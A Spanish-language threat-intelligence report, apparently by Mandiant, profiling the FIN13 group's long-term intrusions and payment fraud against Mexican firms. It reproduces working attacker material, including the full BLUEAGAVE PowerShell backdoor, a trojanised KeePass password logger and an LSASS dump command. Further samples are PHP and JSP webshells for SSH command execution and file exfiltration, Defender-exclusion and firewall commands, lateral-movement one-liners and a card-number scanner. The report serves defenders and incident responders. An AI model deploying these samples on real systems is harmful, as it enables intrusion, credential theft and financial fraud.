FIN13: Un actor de amenaza cibercriminal, enfocado en México

Van Ta, Jake Nicastro, Rufus Brown, Nick Richard
Dec 07, 2021
28 mins read

Desde 2017, Mandiant ha estado rastreando a FIN13, un actor de amenazas diligente y versátil con motivaciones financieras, el cual, realiza intrusiones a largo plazo en México con un marco de tiempo de actividad que se remonta a 2016. Las operaciones de FIN13 tienen varias diferencias notables con respecto a las tendencias actuales de robo de datos de los ciberdelincuentes y la extorsión de ransomware.

Aunque sus operaciones continúan hasta el día de hoy, en muchos sentidos, las intrusiones de FIN13 son como una cápsula del tiempo del ciberdelito financiero tradicional de tiempos pasados. En lugar de los grupos de ransomware de “pisa y corre” que prevalecen en la actualidad, FIN13 se toma su tiempo para recolectar información para realizar transferencias fraudulentas de dinero. En lugar de depender, en gran medida, de marcos de ataque como Cobalt Strike, la mayoría de las intrusiones de FIN13 implican un uso intensivo de puertas traseras pasivas personalizadas y herramientas para acechar en entornos a largo plazo. En este blog, describimos los aspectos notables de las operaciones de FIN13 para destacar un ecosistema regional de ciberdelincuentes que merece más exploración.

Objetivos de FIN13

Desde mediados de 2017, Mandiant ha respondido a múltiples investigaciones las cuales se han atribuido a FIN13. A diferencia de otros actores motivados financieramente, FIN13 tiene objetivos altamente ubicados. Más de cinco años de datos de intrusión de Mandiant muestran que FIN13 opera exclusivamente contra organizaciones con sede en México y se ha dirigido específicamente a grandes organizaciones en las industrias financiera, minorista y hotelera. Una revisión de los datos financieros, disponibles públicamente, muestra que varias de estas organizaciones tienen ingresos anuales de millones a miles de millones en dólares estadounidenses (1 USD = 21,11 MXN al 6 de diciembre de 2021).

FIN13 mapeará minuciosamente la red de una víctima, capturando credenciales, robando documentos corporativos, documentación técnica, bases de datos financieras y otros archivos los cuales respaldarán su objetivo de ganancia financiera por medio de la transferencia fraudulenta de fondos de la organización víctima.

Tiempo de permanencia y vida útil operativa

Las investigaciones de Mandiant determinaron que FIN13 tenía un tiempo medio de permanencia, (definido como la duración entre el inicio de una ciberintrusión y su identificación), de 913 días o 2 años y medio. El largo tiempo de permanencia de un actor con motivación financiera es anómalo y significativo por muchos factores. En el reporte 2021 de Mandiant M-Trends, el 52% de los compromisos tenían tiempos de permanencia de menos de 30 días, mejoró desde el 41% en 2019: "Un factor importante que contribuye al aumento de la proporción de incidentes con tiempos de permanencia de 30 días o menos es el aumento continuo en la proporción de investigaciones que involucraron ransomware, el cual aumentó al 25% en 2020, de un 14% en 2019". El tiempo de permanencia de las investigaciones de ransomware se puede medir en días, mientras que FIN13 suele estar presente en entornos durante años para realizar sus operaciones más sigilosas y obtener la mayor recompensa posible.

Mandiant agrupa la actividad de los actores de amenazas de una variedad de fuentes, incluidas las investigaciones de primera mano realizadas por los equipos de Managed Defense y Respuesta a Incidentes de Mandiant. En una revisión de más de 850 clústeres de actividad motivada financieramente que Mandiant rastrea, FIN13 comparte una estadística convincente con solo otro actor de amenazas: FIN10, el flagelo de Canadá entre 2013 y 2019. Tan solo un 2.6% de los actores de amenazas motivados financieramente, los cuales Mandiant ha rastreado en múltiples intrusiones, se han dirigido a organizaciones en un solo país.

Al considerar las fechas más tempranas y recientes de la actividad identificada ("vida útil operativa") para los grupos, los datos se vuelven interesantes. La mayoría de los grupos de amenazas con motivación financiera, que rastrea Mandiant, tienen una vida útil operativa de menos de un año. Solo diez tienen una vida útil operativa de entre uno y tres años; y cuatro tienen una vida útil superior a tres años. De estos cuatro, sólo dos de ellos han funcionado durante más de cinco años: FIN10 y FIN13, que Mandiant considera poco común,                             Figura 1.

Financially Motivated Threat Groups with Operational Lifespans > 1 Year
Figura 1: Grupos de amenazas motivados financieramente con una vida útil operativa > 1 año

FIN13 tiene una capacidad demostrada para permanecer sigiloso en las redes de organizaciones mexicanas grandes y rentables durante un período de tiempo considerable.

Ciclo de vida de los ataques dirigidos de Mandiant

Los ataques dirigidos suelen seguir una secuencia predecible de eventos. El Apéndice A proporciona información adicional sobre el ciclo de vida de los ataques dirigidos de Mandiant, el cual proporciona las principales fases de una intrusión típica. No todos los ataques siguen el flujo exacto de este modelo; su propósito es proporcionar una representación visual del ciclo de vida de los ataques.

Establecer presencia

Las investigaciones de Mandiant revelan que FIN13 ha explotado, principalmente, servidores externos para implementar webshells genéricos y malware personalizado, incluidos BLUEAGAVE y SIXPACK, para establecer presencia. Los detalles de las explotaciones y las vulnerabilidades específicas, apuntadas a lo largo de los años, no han sido confirmados debido a la evidencia insuficiente agravada por los largos tiempos de permanencia de FIN13. En dos intrusiones separadas, la primera evidencia sugirió una posible explotación contra el servidor WebLogic de la víctima para escribir un webshell genérico. En otro, la evidencia sugirió la explotación de Apache Tomcat. Aunque los detalles sobre el vector exacto son escasos, FIN13 ha utilizado históricamente webshells, en servidores externos, como una puerta de entrada a una víctima.

El uso de JSPRAT, por parte de FIN13, permite al actor lograr la ejecución de comandos locales, cargar/descargar archivos y tráfico de red proxy para un pivote adicional durante las etapas posteriores de la intrusión. FIN13 también ha utilizado, históricamente, webshells disponibles públicamente y codificados en varios lenguajes, incluidos PHP, C# (ASP.NET) y Java.

FIN13 también ha implementado ampliamente la puerta trasera pasiva BLUEAGAVE de PowerShell en los hosts destino al establecer una presencia inicial en el entorno. BLUEAGAVE utiliza la clase HttpListener.NET para establecer un servidor HTTP local en puertos efímeros altos (65510-65512). La puerta trasera escucha las solicitudes HTTP entrantes al URI raíz/en el puerto establecido, analiza la solicitud HTTP y ejecuta los datos codificados, en URL, almacenados dentro de la variable "kmd" de la solicitud por medio del símbolo del sistema de Windows (cmd.exe). La salida de este comando se envía de vuelta al operador en el cuerpo de la respuesta HTTP. Además, Mandiant ha identificado una versión Perl de BLUEAGAVE la cual permite a FIN13 establecerse en los sistemas Linux. A continuación, se muestra un código de PowerShell de muestra de BLUEAGAVE, Figura 2:

Figura 2: Fragmento de código BLUEAGAVE

[Reflection.Assembly]::LoadWithPartialName("System.Web") | Out-Null;

function extract($request) {

    $length = $request.contentlength64;

    $buffer = new - object "byte[]" $length;

    [void]$request.inputstream.read($buffer, 0, $length);

    $body = [system.text.encoding]::ascii.getstring($buffer);

    $data = @ {};

    $body.split('&') | % {

        $part = $_.split('=');

        $data.add($part[0], $part[1]);

    };

    return $data;

};

$routes = @ {

    "POST /" = {

        $data = extract $context.Request;

        $decode = [System.Web.HttpUtility]::UrlDecode($data.item('kmd'));

        $Out = cmd.exe  /c $decode 2 > &1 | Out - String;

        return $Out;

    }

};

$url = 'http://*:65510/';

$listener = New - Object System.Net.HttpListener;

$listener.Prefixes.Add($url);

$listener.Start();

while ($listener.IsListening)  {

    $context = $listener.GetContext();

    $requestUrl = $context.Request.Url;

    $response = $context.Response;

    $localPath = $requestUrl.LocalPath;

    $pattern = "{0} {1}"  - f $context.Request.httpmethod, $requestUrl.LocalPath;

    $route = $routes.Get_Item($pattern);

    if ($route  - eq $null)  {

        $response.StatusCode = 404;

    } else {

        $content = &$route;

        $buffer = [System.Text.Encoding]::UTF8.GetBytes($content);

        $response.ContentLength64 = $buffer.Length;

        $response.OutputStream.Write($buffer, 0, $buffer.Length);

    };

    $response.Close();

    $responseStatus = $response.StatusCode;

}

Mandiant clasifica las puertas traseras pasivas como malware el cual proporciona acceso al entorno de la víctima sin enviar un beacon activo a un servidor de comando y control. Las puertas traseras pasivas pueden incluir webshells o malware personalizado que aceptan o escuchan conexiones entrantes por medio de un protocolo específico. El uso de FIN13 de puertas traseras pasivas, en lugar de puertas traseras activas de uso común como BEACON, demuestra el deseo del actor por el sigilo y las intrusiones sostenidas a largo plazo. FIN13 también mantiene un conocimiento activo de las redes de las víctimas, lo que les ha permitido crear de manera efectiva, pivotes complejos en los entornos de destino desde su punto base inicial. Durante una intrusión reciente, Mandiant observó que FIN13 aprovechó su base inicial para encadenar múltiples webshells y enviar el tráfico a hosts infectados con BLUEAGAVE en el entorno. Debajo de la Figura 3, se muestra un ejemplo de una solicitud HTTP registrada la cual demuestra a FIN13 encadenando múltiples webshells desde su base inicial:

Figura 3: Webshell encadenando solicitudes HTTP

GET /JavaService/shell/exec?cmd=curl%20-
v%20http://10.1.1.1:80/shell2/cmd.jsp%22cmd=whoami%22

Escalación de privilegios

FIN13 utiliza principalmente técnicas comunes de escalación de privilegios, sin embargo, el actor parece flexible para adaptarse cuando se expone a diversas redes de las víctimas. FIN13 se ha basado en utilerías disponibles públicamente, como ProcDump de Windows Sysinternal, para obtener volcados de memoria del proceso del sistema LSASS y, posteriormente, utilizó Mimikatz para analizar los volcados y extraer las credenciales. El siguiente es un ejemplo de un comando de host utilizado por FIN13 para volcar la memoria de proceso de LSASS, Figura 4:

Figura 4: Comando de volcado de memoria LSASS

C:\Windows\Temp\pr64.exe -accepteula -ma lsass.exe C:\Windows\Temp\ls.dmp

Mandiant también ha observado que FIN13 utiliza la utilería legítima de Windows certutil, en algunos casos para ejecutar copias ofuscadas de utilerías como ProcDump para la evasión de detección. En una intrusión, FIN13 utilizó certutil para decodificar una versión codificada en base64 del dropper personalizado LATCHKEY. LATCHKEY es un dropper compilado de PowerShell a EXE (PS2EXE) que, en base64, decodifica y ejecuta la función de PowerSploit Out-Minidump el cual genera un mini volcado para el proceso del sistema LSASS en disco.

FIN13 también ha utilizado algunas técnicas de escalación de privilegios más exclusivas. Por ejemplo, durante una intrusión reciente, Mandiant observó que FIN13 reemplazaba los archivos binarios legítimos de KeePass con versiones troyanizadas las cuales registraban contraseñas recién ingresadas en un archivo de texto local. Esto permitió a FIN13 apuntar y recolectar credenciales para numerosas aplicaciones con el fin de promover su misión. El siguiente es un extracto de código de la versión troyanizada de KeePass implementada por FIN13 en un entorno de cliente, Figura 5:

Figura 5: Fragmento de código troyano de KeePass

private void OnBtnOK(object sender, EventArgs e)

        {

            using (StreamWriter streamWriter = File.AppendText("C:\\windows\\temp\\file.txt"))

            {

                this.m_tbPassword.EnableProtection(false);

                streamWriter.WriteLine(this.m_cmbKeyFile.Text + ":" + this.m_tbPassword.Text);

                this.m_tbPassword.EnableProtection(true);

            }

            if (!this.CreateCompositeKey())

            {

                base.DialogResult = DialogResult.None;

            }

Reconocimiento interno

FIN13 es particularmente experto en aprovechar los archivos binarios del sistema operativo nativo, los guiones, las herramientas de terceros y el malware personalizado para realizar un reconocimiento interno dentro de un entorno comprometido. Este actor parece cómodo aprovechando diversas técnicas para recolectar rápidamente información de fondo que respaldará sus objetivos finales.

Mandiant ha observado que FIN13 utiliza comandos comunes de Windows para recolectar información como whoami, para mostrar detalles de los grupos y privilegios, para el usuario actualmente conectado. Para el reconocimiento de la red, se ha observado que aprovechan ping, nslookup, ipconfig, tracert, netstat y la gama de comandos net. Para recolectar información del host local, el actor de amenazas utilizó systeminfo, fsutil fsinfo, attrib y un uso extensivo del comando dir.

FIN13 incorporó muchos de estos esfuerzos de reconocimiento en guiones con el fin de automatizar sus procesos. Por ejemplo, utilizaron pi.bat para recorrer una lista de direcciones IP en un archivo, ejecutar un comando ping y escribir la salida en un archivo, Figura 6. Un guion similar utilizó dnscmd para exportar las zonas DNS de un host a un archivo.

Figura 6: Contenido del archivo de salida pi.bat

@echo off

for /f "tokens=*" %%a in (C:\windows\temp\ip.t) do (echo trying %%a: >>
C:\windows\temp\log4.txt ping -n 1 %%a >> C:\windows\temp\log4.txt 2>&1)

FIN13 ha aprovechado herramientas de terceros, como NMAP, para respaldar las operaciones de reconocimiento. En tres investigaciones de FIN13, los actores de amenazas emplearon una variante del guion GetUserSPNS.vbs para identificar las cuentas de usuario asociadas con un nombre principal de servicio el cual podría ser blanco de un ataque conocido como "Kerberoasting" para descifrar las contraseñas de los usuarios. También utilizan PowerShell para obtener datos DNS adicionales y exportarlos a un archivo, Figura 7. Se documenta un código similar de PowerShell en una publicación de junio de 2018 en coderoad[.]ru.

Figura 7: Guion de PowerShell para el reconocimiento de DNS

$results = Get - DnsServerZone | % {

    $zone = $_.zonename

    Get - DnsServerResourceRecord $zone | select @ {

        n = 'ZoneName';

        e = {

            $zone

        }

     }, HostName, RecordType, @ {

        n = 'RecordData';

        e = {

            if ($_.RecordData.IPv4Address.IPAddressToString)  {

                $_.RecordData.IPv4Address.IPAddressToString

            } else {

                $_.RecordData.NameServer.ToUpper()

            }

         }

     }

 }

$results | Export-Csv  -NoTypeInformation c:\windows\temp\addcat.csv  -Append

En otro caso, FIN13 ejecutó un guion de PowerShell para extraer eventos de inicio de sesión de un host durante los siete días previos. Es posible que se haya utilizado para recolectar información y permitir que FIN13 se integrara en las operaciones normales de los sistemas objetivo. Además, este guion ayudará a identificar a los usuarios que han iniciado sesión, evento 7001, para el cual no existe un evento 7002 correspondiente. La implicación es que el volcado de LSASS podría adquirir credenciales de usuario, Figura 8. Un código similar de PowerShell está documentado en una publicación de julio de 2018 para codetwo[.]com.

Figura 8: Guion de PowerShell para extraer eventos de inicio de sesión

"C:\Windows\system32\cmd.exe"   / c "echo $hostnm = hostname;

$logs = get-eventlog system -ComputerName $hostnm -source Microsoft-Windows-Winlogon -After (Get-Date).AddDays(-7);

$res = @();

ForEach ($log in $logs){

  if($log.instanceid -eq 7001) {$type = "Logon"}

  Elseif ($log.instanceid -eq 7002){$type="Logoff"}

  Else {Continue} $res += New-Object PSObject -Property @{Time = $log.TimeWritten; User = (New-Object System.Security.Principal.SecurityIdentifier $Log.ReplacementStrings[1]).Translate([System.Security.Principal.NTAccount])}};

$res | Out-File C:\windows\temp\logs1.txt"

Además, FIN13 ha aprovechado la infraestructura corporativa para ejecutar actividades de reconocimiento. Durante una investigación, FIN13 accedió a la consola Symantec Altiris del objetivo, una plataforma de administración de software y hardware, para modificar repetidamente una tarea Run Script existente en la interfaz con el fin de adquirir información de red y host. En otra investigación, FIN13 utilizó una cuenta de LanDesk comprometida para ejecutar comandos para devolver información de host, red y base de datos del entorno.

Sin limitarse a las herramientas disponibles públicamente, FIN13 también ha utilizado varias familias de malware personalizado para ayudar en el reconocimiento interno. En tres investigaciones, FIN13 utilizó PORTHOLE, un escáner de puertos basado en Java, para realizar investigaciones de red. PORTHOLE puede intentar múltiples conexiones de socket a muchas direcciones IP y puertos y, como es multiproceso, puede ejecutar esta operación rápidamente con conexiones múltiples potencialmente superpuestas. El malware acepta, como primer argumento, una dirección IP con comodines en la dirección o un nombre de archivo. El segundo argumento es el rango de puerto inicial para escanear para cada IP y el tercero es el rango de puerto final.

CLOSEWATCH es un webshell JSP el cual se comunica con un escucha en el host local por medio de un puerto específico, escribe archivos arbitrarios en el sistema operativo de la víctima, ejecuta comandos arbitrarios en el host de la víctima, deshabilita el proxy y emite solicitudes HTTP GET personalizables a una variedad de hosts remotos. Si se especifican los parámetros de URL HTTP adecuados, CLOSEWATCH puede crear una conexión de socket al host local en el puerto 16998, en donde puede enviar y recibir datos utilizando comunicaciones similares a HTTP usando codificación de transferencia fragmentada. Si se especifica el parámetro de rango, CLOSEWATCH puede escanear un rango de direcciones IP y puertos utilizando parámetros personalizados. Este malware se observó en una de las primeras investigaciones de FIN13. Aunque recientemente apareció una muestra en un repositorio público, este malware no se ha observado durante investigaciones más recientes. Si bien es más que una simple herramienta de reconocimiento, el parámetro de rango de CLOSEWATCH proporciona a FIN13 otra capacidad de escaneo.

Se ha observado que FIN13 ejecuta la utilería osql de Microsoft, pero también han aprovechado otro webshell JSP, el cual Mandiant rastrea como SPINOFF, para la investigación de SQL. SPINOFF puede ejecutar consultas SQL arbitrarias en bases de datos específicas y descargar los resultados a un archivo. Al igual que CLOSEWATCH, este malware prevaleció en las primeras investigaciones.

Un descargador, el cual Mandiant rastrea como DRAWSTRING, tiene algunas funciones de reconocimiento interno. Si bien principalmente proporciona a FIN13 la capacidad de descargar y ejecutar archivos arbitrarios, DRAWSTRING también ejecutará systeminfo.exe y cargará dicha información en un servidor de comando y control (C2). Al iniciarse, el malware crea persistencia por medio de tres métodos posibles: un servicio, un archivo .lnk o una actualización de la llave de registro Software\Microsoft\Windows\CurrentVersion\Run. El malware comprueba los numerosos procesos antivirus y varía el método de persistencia si se encuentra uno.


Posteriormente, el malware ejecuta los siguientes dos comandos, Figura 9 y Figura 10, donde %s se reemplaza por el nombre del programa:

Figura 9: Comando de PowerShell para modificar la configuración de Windows Defender

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%s"

Este comando Add-MpPreference modifica la configuración de Windows Defender y especifica una ruta de archivo para excluir del análisis programado y en tiempo real.

Figura 10: Comando netsh para permitir comunicaciones DRAWSTRING

Netsh advfirewall firewall add rule name="Software Update" profile=domain,private,public protocol=any enable=yes DIR=Out program="%s" Action=Allow

Este comando agrega una nueva regla a un cortafuegos de Windows el cual permite a DRAWSTRING comunicaciones salientes.

El malware recolecta información del sistema mediante la ejecución de systeminfo.exe y el nombre de usuario, el nombre de la computadora, la información del parche del sistema, la lista de directorios de archivos de programa y la arquitectura están cifrados y codificados en base64. DRAWSTRING, posteriormente, realiza una solicitud HTTP POST por medio del puerto 443 con los datos del sistema capturados. Si bien esta comunicación utiliza el puerto 443, los datos no están a través de TLS/SSL y no están cifrados. El malware realiza 10 intentos de contactar al C2, durmiendo durante 10 segundos entre cada ronda. La respuesta se descifra, guarda y ejecuta.

Un ejemplo de llamada se ilustra en la Figura 11. Mandiant ha observado que FIN13 utiliza la misma dirección IP para DRAWSTRING y GOTBOT2 C2.

Figura 11: Ejemplo de solicitud DRAWSTRING POST

POST /cpl/api.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

host: <Ipv4 address>

Content-Length: 8094
 

Q=<BASE64 Encrypted Data>

Movimiento lateral

El grupo ha aprovechado, con frecuencia, Windows Management Instrumentation (WMI) para ejecutar comandos de forma remota y moverse lateralmente, es decir, empleando el comando wmic nativo, una versión del guion Invoke-WMIExec disponible públicamente, o WMIEXEC. El siguiente es un ejemplo de comando WMIC utilizado por FIN13, Figura 12:

Figura 12: Ejemplo del comando WMIC

wmic /node:"192.168.133.61" /user:"<victim>\<admin account>" /password:<admin password> process call create "powershell -noprofile -ExecutionPolicy Bypass -encodedCommand <Base64>"

En la misma investigación en la que FIN13 ha utilizado wmiexec.vbs, Mandiant también ha observado que el actor utiliza un entunelador personalizado del webshell JSP llamado BUSTEDPIPE para facilitar el movimiento lateral por medio de solicitudes web.

Mandiant también ha observado que FIN13 utiliza utilerías similares a Invoke-WMIExec, como la utilería Invoke-SMBExec de PowerShell, en un cliente de Managed Defense. El siguiente es un ejemplo de comando Invoke-SMBExec utilizado por FIN13, Figura 13:

Figura 13: Comando Invoke-SMBExec de PowerShell

powershell  -ExecutionPolicy Bypass -command "& { . C:\windows\temp\insm.ps1; Invoke-SMBExec -Username <user> -Command 'cmd /c whoami  ' -Domain CB -Hash REDACTED:REDACTED -Target <IP address> }"

NIGHTJAR es un cargador de Java, observado durante múltiples investigaciones, el cual parece estar basado en el código que se encuentra aquí. NIGHTJAR escuchará en un socket designado, proporcionado en tiempo de ejecución en la línea de comando, para descargar un archivo y guardarlo en disco. Este malware no contiene un mecanismo de persistencia y se ha observado en el directorio C:\Windows\Temp o C:\inetpub\wwwroot. Se han observado dos versiones de la sintaxis de la línea de comandos, Figura 14,

Figura 14: Sintaxis de la línea de comandos de NIGHTJAR

[+] Usage: Host Port /file/to/save

Figura 15: Sintaxis secundaria de la línea de comandos de NIGHTJAR

[+] Usage: Interface[localhost] Port /rout/to/save

Para moverse lateralmente entre plataformas, FIN13 ha utilizado su webshell BLUEAGAVE y otros dos webshells PHP pequeños los cuales se utilizaron para ejecutar comandos de forma remota entre sistemas Linux por medio de SSH con un nombre de usuario y contraseña específicos. En la Figura 16 a continuación, se muestra un fragmento de uno de estos webshells.

Figura 16: Shell web ejecutivo SSH

<?php

error_reporting(0);

set_time_limit(0);

 

include('Net/SSH2.php');

 

$ip = file_get_contents('/dev/shm/22.txt');

$command = $_REQUEST['command'];

if($command=='')

{

}

else

{

foreach(preg_split("/((r?n)|(rn?))/", $ip) as $ips){

      $ssh = new Net_SSH2($ips);

      if ($ssh->login('<REDACTED>', '<REDACTED>')) {

            echo "<pre>", $ips, "</pre><br>";

            echo "<pre>", $ssh->exec($command), "</pre> <br>";

      }

      else

      {

            echo "Login Failed  on $ips <br> n";

      }

}

print "El script ha finalizado";

}

?>

Mantener presencia

Las primeras intrusiones de FIN13 involucraron múltiples webshells genéricos para la persistencia, pero a lo largo de los años, FIN13 ha desarrollado una cartera de familias de malware tanto personalizadas como disponibles públicamente para utilizarlas como persistencia en el entorno.

En múltiples intrusiones, FIN13 implementó SIXPACK y SWEARJAR. SIXPACK es un webshell ASPX escrito en C# que funciona como entunelador. SIXPACK acepta datos de formulario HTTP los cuales contienen un host remoto y un puerto TCP para conectarse, un valor de tiempo de espera y datos codificados en Base64 para enviar después de conectarse al host especificado. SIXPACK lee los datos de respuesta y los devuelve al cliente original. SWEARJAR es una puerta trasera multiplataforma basada en Java que puede ejecutar comandos de shell.

En un caso, FIN13 implementó una puerta trasera llamada MAILSLOT, la cual se comunica por medio de SMTP/POP a través de SSL, enviando y recibiendo correos electrónicos desde y hacia una cuenta de correo electrónico configurada controlada por el atacante para su comando y control. MAILSLOT convierte a FIN13 en un caso poco común de un actor de amenazas que ha utilizado comunicaciones por correo electrónico para C2.

También han empleado una utilería personalizada de Mandiant llamada HOTLANE, la cual es un entunelador escrito en C/C ++ el cual puede operar en modo cliente o servidor y se comunica con un protocolo binario personalizado sobre TCP.

Además de su malware personalizado, FIN13 ha utilizado malware disponible públicamente, como la puerta trasera GOBOT2 y TINYSHELL.

Una utilería única disponible al público que ha utilizado el actor es un webshell PHP basado en PHPSPY, que Mandiant rastrea como SHELLSWEEP, contenía funcionalidad para recuperar información de tarjetas de crédito. La siguiente figura contiene un fragmento del webshell PHP, Figura 17.

 

Figura 17: Fragmento de código relacionado con PCI de PHP webshell disponible públicamente

$level = 1;

if (isset($_GET['level'])) $level = $_GET['level'];

$firmas = array("Estandar eval(base64_decode())" = > "/eval\s*\(\s*base64_decode\(\s*/", "eval(gzinflate(base64_decode()))" = > "/eval\s*\(gzinflate\s*\(\s*base64_decode\s*\(\s*/", "D4NB4R WAS HERE" = > "/D4NB4R WAS HERE/", "md5(Safety)" = > "/6472ce41c26babff27b4c28028093d77/", "md5(backdoor1)" = > "/f32e7903a13ff43da2ef1baf36adeca9/", "WSO 2.1 (Web Shell by oRb)" = > "/10b27b168be0f7e90496dbc5fcfa63fc/", "WSO 2.1 (Web Shell by oRb) 2" = > "/Web Shell by oRb/", "milw0rm.com" = > "/milw0rm\.com/", "exploit-db.com" = > "/exploit-db\.com/", "FilesMan" = > "/preg_replace\s*\(\s*(\"|')\/\.\*\/e(\"|')/", "CMD" = > '/(system|exec|passthru)\(\s*\$_GET\[([^\w\d]|\"|\')*cmd([^\w\d]|"|\')*\]\s*\)/', "CC's dump"=>"/num_tarjeta,codigo_sec,fecha_expira/i","root 12345"=>"/'root','12345'/i",);$level2=array("Pasarela (VPCPaymentConnection)"=>"/VPCPaymentConnection/","setSecureSecret(__GROUP__)"=>"/setSecureSecret\s*\(\s*(.+?)\s*\)/","__GROUP____PARSE_ARGS__"=>"/((ifx_connect|oci_connect|mysql_connect|pg_connect|mssql_connect|odbc_connect)\s*\(\s*.+?\s*\)\s*;)/i");if(intval($level)>1){$firmas=array_merge($firmas,$level2);}$level3=array("CC's (__GROUP__)" = > "/[^\w](cc_?num(ber)?|credit_?card|cod_?sec|cvv|num_?cad|num_?exp|tarjeta|numero_?tarjeta|vence_?mes|vence_?ano|c_seg|exp_code?)[^\w]/i", "Visa CC's (__GROUP__)"=>"/[^\d\w]((?:4[0-9]{12}(?:[0-9]{3})?)[^\d\w]/","MasterCard CC's (__GROUP__)" = > "/[^\d\w](5[1-5][0-9]{14})[^\d\w]/", "American Express CC's (__GROUP__)" = > "/([^\d\w]3[47][0-9]{13}[^\d\w])/");

Para ejecutar persistentemente sus puertas traseras, FIN13 ha utilizado llaves de ejecución del Registro de Windows como HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\hosts la cual se configuró para ejecutar un archivo ubicado en C:\WINDOWS\hosts.exe. También han creado tareas programadas con nombres como acrotryr y AppServicesr para ejecutar binarios del mismo nombre en el directorio C:\Windows.

Completar la misión

Si bien muchas organizaciones están inundadas de ransomware, FIN13 monetiza con nostalgia sus intrusiones por medio del robo de datos dirigido para permitir transacciones fraudulentas. FIN13 ha exfiltrado datos comúnmente dirigidos, como volcados de proceso LSASS y llaves de registro, pero en última instancia se dirigió a usuarios eficaces para alcanzar sus objetivos financieros. En una intrusión, FIN13 enlistó, específicamente, todos los usuarios y roles principales del sistema de tesorería de la víctima. FIN13, posteriormente, se trasladó más a las partes sensibles de la red, incluidas las redes POS y ATM, donde podrían exfiltrar una variedad de datos altamente específicos.

En una víctima, FIN13 exfiltró archivos relacionados con Verifone, un software de uso común el cual facilita las transferencias de dinero en los sistemas POS. En al menos un caso, FIN13 exfiltró la carpeta base completa para un sistema POS la cual incluía dependencias de archivos, imágenes utilizadas para imprimir recibos y archivos .wav utilizados para efectos de sonido. En una víctima diferente, FIN13 robó de manera similar archivos de dependencia para el software del cajero automático de la víctima. La información robada, de sistemas importantes, para una transacción monetaria podría utilizarse para iluminar posibles vías de actividad fraudulenta.

FIN13 también interactuó con bases de datos para recolectar información sensible desde el punto de vista financiero. En una base de datos de las víctimas, FIN13 recuperó el contenido de las siguientes tablas para su exfiltración:

  • "claves_retiro" (English translation "withdrawal keys")
  • "codigos_retiro_sin_tarjeta" (English translation "keyless card withdrawal codes")
  • "retirosefectivo" (English translation "cash withdrawal")

Con el tesoro en la mano, FIN13 disfrazó sus datos almacenados mediante el uso de la utilería certutil de Windows para generar un certificado falso, codificado en Base64, con el archivo de entrada. El certificado contenía el contenido del archivo de almacenamiento, Figura 18, preparado para su exfiltración con declaraciones normales de inicio y finalización del certificado, como:

Figura 18: Datos de archive, por etapas, en certificado

-----BEGIN CERTIFICATE-----

UmFyIRoHAM+QcwAADQAAAAAAAABtB3TAkEgADWsDAV5qvgMCpojeh0SF+EodMyMA

IAAAAFVzZXJzXGFkbV9zcWxcQXBwRGF0YVxSb2FtaW5nXGwuZG1wALDbslQiIdVV

[truncated]

54Mt/3107vXRoa10YPmXffXCPQ+LF4vq3vhdKn+Z+tdaYeD/IgueHaxaff6yZMmT

JkyZMmTepv/ExD17AEAHAA==

-----END CERTIFICATE-----

FIN13, posteriormente, exfiltró los datos por medio de webshells previamente implementados en el entorno o utilizando una herramienta JSP simple, Figura 19, en un directorio accesible desde la web como:

Figura 19: Ejemplo de JSP utilizado para el robo de datos

<%@ page buffer="none" %>

<%@page import="java.io.*"%>

<%String down="I:\\[attacker created dir]\\[attacker created archive]";

      if(down!=null){

      response.setContentType("APPLICATION/OCTET-STREAM");

      response.setHeader("Content-Disposition","attachment; filename=\"" + down + "\"");

      FileInputStream fileInputStream=new FileInputStream(down);

      int i;

      while ((i=fileInputStream.read()) != -1) {

      out.write(i);}fileInputStream.close();}%>

Aunque FIN13 apuntó a datos específicos los cuales podrían ayudar a transacciones fraudulentas, no siempre pudimos ser testigos de primera mano de cómo FIN13 capitalizó la información robada. En una víctima, pudimos recuperar una herramienta llamada GASCAN, la cual nos dio visibilidad de su juego final.

GASCAN es un malware basado en Java que procesa datos de punto de venta y envía mensajes especialmente diseñados a un servidor remoto especificado por la línea de comandos. Los datos enviados contienen un valor que corresponde a uno de los dos diferentes tipos de mensajes ISO 8583 y se pueden utilizar para construir transacciones fraudulentas ISO 8583. El primer tipo de mensaje, 0100, indica los datos correspondientes a un mensaje de autorización y se utiliza para determinar si existen fondos disponibles en una cuenta específica. Después de recibir el primer mensaje, el servidor C2 devuelve un búfer que incluye la cadena "Aprobada". El segundo tipo de mensaje, 0200, contiene datos utilizados para un mensaje de solicitud financiera y se utiliza para contabilizar un cargo en una cuenta específica. La segunda estructura de mensaje incluye un campo llamado "monto". El valor de “monto” se calcula utilizando una función interna que devuelve un número generado aleatoriamente entre 2000 y 3000, utilizado como el monto de la transacción enviada en el segundo mensaje. Según la información enviada, es probable que el servidor remoto especificado sea responsable de formatear y enviar el mensaje ISO 8583 para transacciones fraudulentas.

La muestra de GASCAN se adaptó al entorno de la víctima y los datos esperados de los sistemas POS utilizados por la organización. La misma víctima fue alertada de más de mil transacciones fraudulentas en un corto período de tiempo, por un total de millones de pesos o varios cientos de miles de dólares estadounidenses.

Panorama

Entre la compleja red de actividades ciberdelincuentes, el crimen organizado tradicional que recurre a la criptomoneda, los ataques agresivos de Corea del Norte, el espionaje chino, y la pandemia de ransomware, el ciberespacio latinoamericano seguirá siendo un área de investigación adicional en los próximos años, como lo señaló Proofpoint y ESET a principios de este año.

En particular, mientras que el ransomware ha capturado el espíritu de la época del ciberdelincuente, Mandiant no ha observado que FIN13 implemente ransomware en una intrusión al momento de este blog. FIN13 se ha enfocado en los ciberdelitos más tradicionales, motivados financieramente, y se ha enfocado en los sistemas Linux y Windows en todas sus operaciones. Queda por ver si los actores criminales latinoamericanos también pasarán a ejecutar principalmente operaciones de ransomware o continuarán persiguiendo el fraude.

Los equipos y ejecutivos de seguridad de América Latina deben ser conscientes de estas amenazas, evaluar su postura actual y adaptarse en consecuencia. Mandiant anima a estas organizaciones a seguir colaborando con la industria en general para mitigar estas amenazas. El equipo de consultores de respuesta a incidentes, preparación estratégica, y aseguramiento técnico de Mandiant en México, y en todo el mundo está listo para ayudar con estos esfuerzos.

 

Más información

Aprenda más de FIN13 y SWEARJAR, una puerta trasera usada por FIN13 que recibe comandos mediante registros TXT de DNS, registrándose a la suscripción gratuita de Mandiant Advantage Threat Intelligence.

¿Ya registrado? Lea el informe FIN13, el perfil de malware SWEARJAR, y los informes adicionales sobre la puerta trasera.

Indicadores de compromiso

FAMILIA DE MALWARE

MD5

SHA1

